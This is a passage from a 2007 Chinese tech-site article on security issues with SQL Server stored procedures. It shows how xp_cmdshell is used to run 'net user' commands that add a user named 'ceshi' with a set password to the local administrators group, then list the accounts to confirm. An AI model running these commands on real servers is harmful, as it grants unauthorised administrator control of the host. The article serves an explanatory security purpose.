科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网软件频道SQL Server中存储过程的安全问题(2)

SQL Server中存储过程的安全问题(2)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

首先让我们来了解一下SQLServer中的存储过程。存储过程是存储在SQLServer中的预先写好的SQL语句集合。

作者:王岗 来源:赛迪网 2007年9月13日

关键字: 安全 SQL Server SQL Server 各版本 数据库

  • 评论
  • 分享微博
  • 分享邮件

然后再用SQL Exec运行SQLCMD命令,发现SQLCMD可以使用了(如图3)。

SQL Server中存储过程的安全问题(2)

图3

我们再来在查询分析器里添加一个管理员用户(如图4),语句为

exec master..xp_cmdshell 'net user ceshi 98765321 /add'

exec master..xp_cmdshell 'net localgroup administrators ceshi /add',不用多做解释了吧,ceshi是管理员,密码为98765321。

SQL Server中存储过程的安全问题(2)

图4

命令执行完后,我们来看一下结果,语句为:

exec master..xp_cmdshell 'net user' (如图5)

SQL Server中存储过程的安全问题(2)

图5
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章